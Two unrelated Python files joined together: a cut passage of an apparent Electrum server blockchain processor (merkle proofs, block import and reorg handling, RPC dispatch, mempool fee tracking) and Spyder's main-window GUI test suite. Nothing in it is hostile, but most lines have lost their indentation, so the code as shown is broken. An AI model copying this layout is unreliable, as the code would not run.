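        # the last hash if the level has odd length, pair the hashes, record
        # the sibling of the node on the path to the target, and move up.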
while len(merkle) != 1:
if len(merkle) % 2:
merkle.append(merkle[-1])
n = []
while merkle:
new_hash = Hash(merkle[0] + merkle[1])
if merkle[0] == target_hash:
s.append(hash_encode(merkle[1]))
target_hash = new_hash
elif merkle[1] == target_hash:
s.append(hash_encode(merkle[0]))
target_hash = new_hash
n.append(new_hash)
merkle = merkle[2:]
merkle = n
out = {"block_height": height, "merkle": s, "pos": tx_pos}
with self.cache_lock:
if len(self.merkle_cache) > self.max_cache_size:
logger.info("clearing merkle cache")
self.merkle_cache.clear()
self.merkle_cache[tx_hash] = out
return out
@staticmethod
def deserialize_block(block):
txlist = block.get('tx')
tx_hashes = [] # ordered txids
txdict = {} # deserialized tx
is_coinbase = True
for raw_tx in txlist:
tx_hash = hash_encode(Hash(raw_tx.decode('hex')))
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
tx = deserialize.parse_Transaction(vds, is_coinbase)
except:
print_log("ERROR: cannot parse", tx_hash)
print_log(traceback.format_exc())
continue
tx_hashes.append(tx_hash)
txdict[tx_hash] = tx
is_coinbase = False
return tx_hashes, txdict
def import_block(self, block, block_hash, block_height, revert=False):
touched_addr = set()
# deserialize transactions
tx_hashes, txdict = self.deserialize_block(block)
# undo info
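        # Importing a block records per-transaction undo data so the block can
        # be reverted during a reorg; reverting consumes that data with the
        # transactions processed in reverse order.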
if revert:
undo_info = self.storage.get_undo_info(block_height)
tx_hashes.reverse()
else:
undo_info = {}
for txid in tx_hashes: # must be ordered
tx = txdict[txid]
if not revert:
undo = self.storage.import_transaction(txid, tx, block_height, touched_addr)
undo_info[txid] = undo
else:
undo = undo_info.pop(txid)
self.storage.revert_transaction(txid, tx, block_height, touched_addr, undo)
if revert:
assert undo_info == {}
# add undo info
if not revert:
self.storage.write_undo_info(block_height, self.bitcoind_height, undo_info)
# add the max
self.storage.save_height(block_hash, block_height)
for addr in touched_addr:
self.invalidate_cache(addr)
self.storage.update_hashes()
# batch write modified nodes
self.storage.batch_write()
# return length for monitoring
return len(tx_hashes)
def add_request(self, session, request):
        # see if we can get it from the cache; if not, add the request to the queue
message_id = request.get('id')
try:
result = self.process(request, cache_only=True)
except BaseException as e:
self.push_response(session, {'id': message_id, 'error': str(e)})
return
if result == -1:
self.queue.put((session, request))
else:
self.push_response(session, {'id': message_id, 'result': result})
def do_subscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session not in self.watch_blocks:
self.watch_blocks.append(session)
elif method == 'blockchain.headers.subscribe':
if session not in self.watch_headers:
self.watch_headers.append(session)
elif method == 'blockchain.address.subscribe':
address = params[0]
l = self.watched_addresses.get(address)
if l is None:
self.watched_addresses[address] = [session]
elif session not in l:
l.append(session)
def do_unsubscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session in self.watch_blocks:
self.watch_blocks.remove(session)
elif method == 'blockchain.headers.subscribe':
if session in self.watch_headers:
self.watch_headers.remove(session)
elif method == "blockchain.address.subscribe":
addr = params[0]
l = self.watched_addresses.get(addr)
if not l:
return
if session in l:
l.remove(session)
if session in l:
print_log("error rc!!")
self.shared.stop()
if l == []:
del self.watched_addresses[addr]
def process(self, request, cache_only=False):
message_id = request['id']
method = request['method']
params = request.get('params', ())
result = None
error = None
if method == 'blockchain.numblocks.subscribe':
result = self.storage.height
elif method == 'blockchain.headers.subscribe':
result = self.header
elif method == 'blockchain.address.subscribe':
address = str(params[0])
result = self.get_status(address, cache_only)
elif method == 'blockchain.address.get_history':
address = str(params[0])
result = self.get_history(address, cache_only)
elif method == 'blockchain.address.get_mempool':
address = str(params[0])
result = self.get_unconfirmed_history(address)
elif method == 'blockchain.address.get_balance':
address = str(params[0])
confirmed = self.storage.get_balance(address)
unconfirmed = self.get_unconfirmed_value(address)
result = { 'confirmed':confirmed, 'unconfirmed':unconfirmed }
elif method == 'blockchain.address.get_proof':
address = str(params[0])
result = self.storage.get_proof(address)
elif method == 'blockchain.address.listunspent':
address = str(params[0])
result = self.storage.listunspent(address)
elif method == 'blockchain.utxo.get_address':
txid = str(params[0])
pos = int(params[1])
txi = (txid + int_to_hex4(pos)).decode('hex')
result = self.storage.get_address(txi)
elif method == 'blockchain.block.get_header':
if cache_only:
result = -1
else:
height = int(params[0])
result = self.get_header(height)
elif method == 'blockchain.block.get_chunk':
if cache_only:
result = -1
else:
index = int(params[0])
result = self.get_chunk(index)
elif method == 'blockchain.transaction.broadcast':
try:
txo = self.bitcoind('sendrawtransaction', params)
print_log("sent tx:", txo)
result = txo
except BaseException, e:
error = e.args[0]
if error["code"] == -26:
# If we return anything that's not the transaction hash,
# it's considered an error message
message = error["message"]
if "non-mandatory-script-verify-flag" in message:
result = "Your client produced a transaction that is not accepted by the Bitcoin network any more. Please upgrade to Electrum 2.5.1 or newer\n"
else:
result = "The transaction was rejected by network rules.(" + message + ")\n" \
"[" + params[0] + "]"
else:
result = error["message"] # do send an error
print_log("error:", result)
elif method == 'blockchain.transaction.get_merkle':
tx_hash = params[0]
tx_height = params[1]
result = self.get_merkle(tx_hash, tx_height, cache_only)
elif method == 'blockchain.transaction.get':
tx_hash = params[0]
result = self.bitcoind('getrawtransaction', (tx_hash, 0))
elif method == 'blockchain.estimatefee':
num = int(params[0])
result = self.bitcoind('estimatefee', (num,))
elif method == 'blockchain.relayfee':
result = self.relayfee
else:
raise BaseException("unknown method:%s" % method)
return result
def get_block(self, block_hash):
block = self.bitcoind('getblock', (block_hash,))
rawtxreq = []
i = 0
for txid in block['tx']:
rawtxreq.append({
"method": "getrawtransaction",
"params": (txid,),
"id": i,
})
i += 1
postdata = dumps(rawtxreq)
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
logger.error("bitcoind error (getfullblock)")
self.wait_on_bitcoind()
continue
try:
rawtxdata = []
for ir in r:
assert ir['error'] is None, "Error: make sure you run bitcoind with txindex=1; use -reindex if needed."
rawtxdata.append(ir['result'])
except BaseException as e:
logger.error(str(e))
self.wait_on_bitcoind()
continue
block['tx'] = rawtxdata
return block
def catch_up(self, sync=True):
self.start_catchup_height = self.storage.height
prev_root_hash = None
n = 0
while not self.shared.stopped():
# are we done yet?
info = self.bitcoind('getinfo')
self.relayfee = info.get('relayfee')
self.bitcoind_height = info.get('blocks')
bitcoind_block_hash = self.bitcoind('getblockhash', (self.bitcoind_height,))
if self.storage.last_hash == bitcoind_block_hash:
self.up_to_date = True
break
self.set_time()
revert = (random.randint(1, 100) == 1) if self.test_reorgs and self.storage.height>100 else False
# not done..
self.up_to_date = False
try:
next_block_hash = self.bitcoind('getblockhash', (self.storage.height + 1,))
except BaseException, e:
revert = True
next_block = self.get_block(next_block_hash if not revert else self.storage.last_hash)
if (next_block.get('previousblockhash') == self.storage.last_hash) and not revert:
prev_root_hash = self.storage.get_root_hash()
n = self.import_block(next_block, next_block_hash, self.storage.height+1)
self.storage.height = self.storage.height + 1
self.write_header(self.block2header(next_block), sync)
self.storage.last_hash = next_block_hash
else:
# revert current block
block = self.get_block(self.storage.last_hash)
print_log("blockchain reorg", self.storage.height, block.get('previousblockhash'), self.storage.last_hash)
n = self.import_block(block, self.storage.last_hash, self.storage.height, revert=True)
self.pop_header()
self.flush_headers()
self.storage.height -= 1
# read previous header from disk
self.header = self.read_header(self.storage.height)
self.storage.last_hash = self.hash_header(self.header)
if prev_root_hash:
assert prev_root_hash == self.storage.get_root_hash()
prev_root_hash = None
# print time
self.print_time(n)
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
if self.shared.stopped():
print_log( "closing database" )
self.storage.close()
def memorypool_update(self):
t0 = time.time()
mempool_hashes = set(self.bitcoind('getrawmempool'))
touched_addresses = set()
# get new transactions
new_tx = {}
for tx_hash in mempool_hashes:
if tx_hash in self.mempool_hashes:
continue
tx = self.get_mempool_transaction(tx_hash)
if not tx:
continue
new_tx[tx_hash] = tx
# remove older entries from mempool_hashes
self.mempool_hashes = mempool_hashes
# check all tx outputs
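        # Fee accounting is done in two passes: the output sum is subtracted
        # here (the fee starts at -out_sum) and the input values are added in
        # the second pass below, leaving fee = inputs - outputs.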
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
out_values = []
out_sum = 0
for x in tx.get('outputs'):
addr = x.get('address', '')
value = x['value']
out_values.append((addr, value))
if not addr:
continue
v = mpa.get(addr, 0)
v += value
mpa[addr] = v
touched_addresses.add(addr)
out_sum += value
self.mempool_fees[tx_hash] = -out_sum
self.mempool_addresses[tx_hash] = mpa
self.mempool_values[tx_hash] = out_values
# check all inputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
# are we spending unconfirmed inputs?
unconfirmed = set()
input_sum = 0
for x in tx.get('inputs'):
prev_hash = x.get('prevout_hash')
prev_n = x.get('prevout_n')
mpv = self.mempool_values.get(prev_hash)
if mpv:
addr, value = mpv[prev_n]
unconfirmed.add(prev_hash)
else:
txi = (prev_hash + int_to_hex4(prev_n)).decode('hex')
try:
addr = self.storage.get_address(txi)
value = self.storage.get_utxo_value(addr,txi)
except:
print_log("utxo not in database; postponing mempool update")
return
# we can proceed
input_sum += value
if not addr:
continue
v = mpa.get(addr, 0)
v -= value
mpa[addr] = v
touched_addresses.add(addr)
self.mempool_unconfirmed[tx_hash] = unconfirmed
self.mempool_addresses[tx_hash] = mpa
self.mempool_fees[tx_hash] += input_sum
# remove deprecated entries from mempool_addresses
for tx_hash, addresses in self.mempool_addresses.items():
if tx_hash not in self.mempool_hashes:
del self.mempool_addresses[tx_hash]
del self.mempool_values[tx_hash]
del self.mempool_unconfirmed[tx_hash]
del self.mempool_fees[tx_hash]
touched_addresses.update(addresses)
# remove deprecated entries from mempool_hist
new_mempool_hist = {}
for addr in self.mempool_hist.iterkeys():
h = self.mempool_hist[addr]
hh = []
for tx_hash, delta in h:
if tx_hash in self.mempool_addresses:
hh.append((tx_hash, delta))
if hh:
new_mempool_hist[addr] = hh
# add new transactions to mempool_hist
for tx_hash in new_tx.iterkeys():
addresses = self.mempool_addresses[tx_hash]
for addr, delta in addresses.iteritems():
h = new_mempool_hist.get(addr, [])
if (tx_hash, delta) not in h:
h.append((tx_hash, delta))
new_mempool_hist[addr] = h
with self.mempool_lock:
self.mempool_hist = new_mempool_hist
# invalidate cache for touched addresses
for addr in touched_addresses:
self.invalidate_cache(addr)
t1 = time.time()
if t1-t0>1:
print_log('mempool_update', t1-t0, len(self.mempool_hashes), len(self.mempool_hist))
def invalidate_cache(self, address):
with self.cache_lock:
if address in self.history_cache:
# print_log("cache: invalidating", address)
del self.history_cache[address]
with self.watch_lock:
sessions = self.watched_addresses.get(address)
if sessions:
# TODO: update cache here. if new value equals cached value, do not send notification
self.address_queue.put((address,sessions))
def close(self):
self.blockchain_thread.join()
print_log("Closing database...")
self.storage.close()
print_log("Database is closed")
def main_iteration(self):
if self.shared.stopped():
print_log("Stopping timer")
return
self.catch_up()
self.memorypool_update()
if self.sent_height != self.storage.height:
self.sent_height = self.storage.height
for session in self.watch_blocks:
self.push_response(session, {
'id': None,
'method': 'blockchain.numblocks.subscribe',
'params': (self.storage.height,),
})
if self.sent_header != self.header:
self.sent_header = self.header
for session in self.watch_headers:
self.push_response(session, {
'id': None,
'method': 'blockchain.headers.subscribe',
'params': (self.header,),
})
while True:
try:
addr, sessions = self.address_queue.get(False)
except:
break
status = self.get_status(addr)
for session in sessions:
self.push_response(session, {
'id': None,
'method': 'blockchain.address.subscribe',
'params': (addr, status),
})
|
test_mainwindow.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""
# Standard library imports
from distutils.version import LooseVersion
import os
import os.path as osp
import re
import shutil
import sys
import tempfile
from textwrap import dedent
from unittest.mock import Mock, MagicMock
import uuid
# Third party imports
from flaky import flaky
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pylint
import pytest
from qtpy import PYQT5, PYQT_VERSION
from qtpy.QtCore import Qt, QTimer, QUrl
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QLineEdit,
QTabBar, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE
# Local imports
from spyder import __trouble_url__, __project_url__
from spyder.app import start
from spyder.app.mainwindow import MainWindow
from spyder.config.base import get_home_dir, get_conf_path, get_module_path
from spyder.config.manager import CONF
from spyder.plugins.base import PluginWindow
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.plugins.projects.api import EmptyProject
from spyder.py3compat import PY2, to_text_string
from spyder.utils.misc import remove_backslashes
from spyder.widgets.dock import DockTitleBar
# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
# Time to wait until the IPython console is ready to receive input
# (in milliseconds)
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000
# A longer timeout is needed because the ".pyx" file must be cythonized and
# C-compiled before it can be imported and evaluated
COMPILE_AND_EVAL_TIMEOUT = 30000
# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000
# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
"""Open a file using the Editor and its open file dialog"""
top_level_widgets = QApplication.topLevelWidgets()
for w in top_level_widgets:
if isinstance(w, QFileDialog):
if directory is not None:
w.setDirectory(directory)
input_field = w.findChildren(QLineEdit)[0]
input_field.setText(fname)
QTest.keyClick(w, Qt.Key_Enter)
def get_thirdparty_plugin(main_window, plugin_title):
"""Get a reference to the thirdparty plugin with the title given."""
for plugin in main_window.thirdparty_plugins:
try:
# New API
if plugin.get_name() == plugin_title:
return plugin
except AttributeError:
# Old API
if plugin.get_plugin_title() == plugin_title:
return plugin
def reset_run_code(qtbot, shell, code_editor, nsb):
"""Reset state after a run code test"""
qtbot.waitUntil(lambda: not shell._executing)
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
**kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name=kernel_name)
if spykernel:
km._kernel_spec = SpyderKernelSpec()
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
def find_desired_tab_in_window(tab_name, window):
all_tabbars = window.findChildren(QTabBar)
for current_tabbar in all_tabbars:
for tab_index in range(current_tabbar.count()):
if current_tabbar.tabText(tab_index) == str(tab_name):
return current_tabbar, tab_index
return None, None
# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request, tmpdir):
"""Main Window fixture"""
# Tests assume inline backend
CONF.set('ipython_console', 'pylab/backend', 0)
    # Tests assume the plots are rendered in the console as png
CONF.set('plots', 'mute_inline_plotting', False)
CONF.set('ipython_console', 'pylab/inline/figure_format', 0)
# Set exclamation mark to True
CONF.set('ipython_console', 'pdb_use_exclamation_mark', True)
# Check if we need to use introspection in a given test
# (it's faster and less memory consuming not to use it!)
use_introspection = request.node.get_closest_marker('use_introspection')
if use_introspection:
os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
else:
try:
os.environ.pop('SPY_TEST_USE_INTROSPECTION')
except KeyError:
pass
# Only use single_instance mode for tests that require it
single_instance = request.node.get_closest_marker('single_instance')
if single_instance:
CONF.set('main', 'single_instance', True)
else:
CONF.set('main', 'single_instance', False)
    # Check if we need to preload a project in a given test
preload_project = request.node.get_closest_marker('preload_project')
if preload_project:
# Create project
project_path = str(tmpdir.mkdir('test_project'))
project = EmptyProject(project_path)
CONF.set('project_explorer', 'current_project_path', project_path)
# Add some files to project
filenames = [
osp.join(project_path, f) for f in
['file1.py', 'file2.py', 'file3.txt']
]
for filename in filenames:
with open(filename, 'w') as f:
if osp.splitext(filename)[1] == '.py':
f.write("def f(x):\n"
" return x\n")
else:
f.write("Hello world!")
project.set_recent_files(filenames)
else:
CONF.set('project_explorer', 'current_project_path', None)
# Get config values passed in parametrize and apply them
try:
param = request.param
if isinstance(param, dict) and 'spy_config' in param:
CONF.set(*param['spy_config'])
except AttributeError:
pass
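    # The Spyder window is started only once and cached on the fixture
    # function itself; subsequent tests reuse that window after the fixture
    # closes any open files, projects and console clients below.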
if not hasattr(main_window, 'window'):
# Start the window
window = start.main()
main_window.window = window
else:
window = main_window.window
# Close everything we can think of
window.editor.close_file()
window.projects.close_project()
if window.console.error_dialog:
window.console.close_error_dialog()
window.switcher.close()
for client in window.ipyconsole.get_clients():
window.ipyconsole.close_client(client=client, force=True)
window.outlineexplorer.stop_symbol_services('python')
# Reset cwd
window.explorer.chdir(get_home_dir())
yield window
# Print shell content if failed
if request.node.rep_setup.passed:
if request.node.rep_call.failed:
# Print content of shellwidget and close window
print(window.ipyconsole.get_current_shellwidget(
)._control.toPlainText())
            # Print the info page content if it is not blank
console = window.ipyconsole
client = console.get_current_client()
if client.info_page != client.blank_page:
print('info_page')
print(client.info_page)
window.close()
del main_window.window
@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
"""Cleanup a testing directory once we are finished."""
def remove_test_dir():
if hasattr(main_window, 'window'):
try:
main_window.window.close()
except AttributeError:
pass
request.addfinalizer(remove_test_dir)
# =============================================================================
# ---- Tests
# =============================================================================
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.single_instance
@pytest.mark.skipif(os.environ.get('CI', None) is None,
reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
"""Test single instance mode and %edit magic."""
editorstack = main_window.editor.get_current_editorstack()
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
spy_dir = osp.dirname(get_module_path('spyder'))
lock_code = (
"import sys\n"
"sys.path.append(r'{spy_dir_str}')\n"
"from spyder.utils.external import lockfile\n"
"lock_file = r'{lock_file}'\n"
"lock = lockfile.FilesystemLock(lock_file)\n"
"lock_created = lock.lock()\n"
"print(lock_created)".format(
spy_dir_str=spy_dir,
lock_file=get_conf_path('spyder.lock'))
)
with qtbot.waitSignal(shell.executed, timeout=2000):
shell.execute(lock_code)
assert not shell.get_value('lock_created')
# Test %edit magic
n_editors = editorstack.get_stack_count()
p = tmpdir.mkdir("foo").join("bar.py")
p.write(lock_code)
with qtbot.waitSignal(shell.executed):
shell.execute('%edit {}'.format(to_text_string(p)))
qtbot.wait(3000)
assert editorstack.get_stack_count() == n_editors + 1
assert editorstack.get_current_editor().toPlainText() == lock_code
main_window.editor.close_file()
@pytest.mark.slow
def test_lock_action(main_window):
"""Test the lock interface action."""
action = main_window.lock_interface_action
plugins = main_window.widgetlist
# By default the interface is locked.
assert main_window.interface_locked
# In this state the title bar is an empty QWidget
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert not isinstance(title_bar, DockTitleBar)
assert isinstance(title_bar, QWidget)
# Test that our custom title bar is shown when the action
# is triggered.
action.trigger()
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert isinstance(title_bar, DockTitleBar)
assert not main_window.interface_locked
# Restore default state
action.trigger()
assert main_window.interface_locked
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.skipif(os.name == 'nt' and PY2, reason="Fails on win and py2")
def test_default_plugin_actions(main_window, qtbot):
"""Test the effect of dock, undock, close and toggle view actions."""
# Use a particular plugin
file_explorer = main_window.explorer
# Undock action
file_explorer._undock_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert file_explorer._undocked_window is not None
assert isinstance(file_explorer._undocked_window, PluginWindow)
assert file_explorer._undocked_window.centralWidget() == file_explorer
# Dock action
file_explorer._dock_action.triggered.emit(True)
qtbot.wait(500)
assert file_explorer.dockwidget.isVisible()
assert file_explorer._undocked_window is None
# Close action
file_explorer._close_plugin_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert not file_explorer._toggle_view_action.isChecked()
# Toggle view action
file_explorer._toggle_view_action.setChecked(True)
assert file_explorer.dockwidget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True)
def test_opengl_implementation(main_window, qtbot):
"""
Test that we are setting the selected OpenGL implementation
"""
assert main_window._test_setting_opengl('software')
# Restore default config value
CONF.set('main', 'opengl', 'automatic')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
"""
Test that we filter a warning shown when an array contains nan
    values and the Variable Explorer option 'Show arrays min/max'
is on.
For spyder-ide/spyder#7063.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create an array with a nan value
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np; A=np.full(16, np.nan)')
qtbot.wait(1000)
# Assert that no warnings are shown in the console
assert "warning" not in control.toPlainText()
assert "Warning" not in control.toPlainText()
# Restore default config value
CONF.set('variable_explorer', 'minmax', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
reason="Times out in PY2 and fails on other than macOS")
def test_get_help_combo(main_window, qtbot):
"""
Test that Help can display docstrings for names typed in its combobox.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
if WEBENGINE:
webpage = webview.page()
else:
webpage = webview.page().mainFrame()
# --- From the console ---
# Write some object in the console
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np')
# Get help - numpy
object_combo = help_plugin.get_widget().object_combo
object_combo.setFocus()
qtbot.keyClicks(object_combo, 'numpy', delay=100)
    # Check that the expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - numpy.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
    # Check that the expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
# Get help - np
# Clear combo
object_combo.set_current_text('')
qtbot.keyClicks(object_combo, 'np', delay=100)
    # Check that the expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - np.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
    # Check that the expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
with dot calls i.e np.sin
See spyder-ide/spyder#11821
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name
qtbot.keyClicks(control, u'np.linalg.norm')
# Get help
control.inspect_current_object()
    # Check that the expected text is part of the page
qtbot.waitUntil(
lambda: check_text(webpage, "Matrix or vector norm."),
timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_special_characters(
main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
for unusual characters.
See spyder-ide/spyder#7699
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name and assert in Console
def check_control(control, value):
return value in control.toPlainText()
qtbot.keyClicks(control, u'aa\t')
qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000)
# Get help
control.inspect_current_object()
    # Check that the expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' and os.environ.get('CI') is not None,
reason="Times out on AppVeyor")
def test_get_help_ipython_console(main_window, qtbot):
"""Test that Help works when called from the IPython console."""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write some object in the console
qtbot.keyClicks(control, 'runfile')
# Get help
control.inspect_current_object()
    # Check that the expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Does not work on Mac and Windows!")
@pytest.mark.use_introspection
@pytest.mark.parametrize(
"object_info",
[("range", "range"),
("import matplotlib.pyplot as plt",
"The object-oriented API is recommended for more complex plots.")])
def test_get_help_editor(main_window, qtbot, object_info):
"""Test that Help works when called from the Editor."""
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
main_window.editor.new(fname="test.py", text="")
code_editor = main_window.editor.get_focus_widget()
editorstack = main_window.editor.get_current_editorstack()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Write some object in the editor
object_name, expected_text = object_info
code_editor.set_text(object_name)
code_editor.move_cursor(len(object_name))
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_change()
# Get help
with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000):
editorstack.inspect_current_object()
    # Check that the expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000)
@pytest.mark.slow
def test_window_title(main_window, tmpdir):
"""Test window title with non-ascii characters."""
projects = main_window.projects
# Create a project in non-ascii path
path = to_text_string(tmpdir.mkdir(u'測試'))
projects.open_project(path=path)
# Set non-ascii window title
main_window.window_title = u'اختبار'
# Assert window title is computed without errors
# and has the expected strings
main_window.set_window_title()
title = main_window.base_title
assert u'Spyder' in title
assert u'Python' in title
assert u'اختبار' in title
assert u'測試' in title
projects.close_project()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or PY2, reason="It fails sometimes")
@pytest.mark.parametrize(
"debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
"""Test that we move to the first breakpoint if there's one present."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Load test file
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=10)
qtbot.wait(500)
cursor = code_editor.textCursor()
cursor.setPosition(0)
code_editor.setTextCursor(cursor)
if debugcell:
# Advance 2 cells
for i in range(2):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.ShiftModifier)
qtbot.wait(500)
# Debug the cell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return,
modifier=Qt.AltModifier | Qt.ShiftModifier)
# Make sure everything is ready
assert shell.spyder_kernel_comm.is_open()
assert shell.is_waiting_pdb_input()
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!b')
assert 'script.py:10' in shell._control.toPlainText()
# We need to press continue as we don't test yet if a breakpoint
# is in the cell
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
else:
# Click the debug button
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Verify that we are at first breakpoint
shell.clear_console()
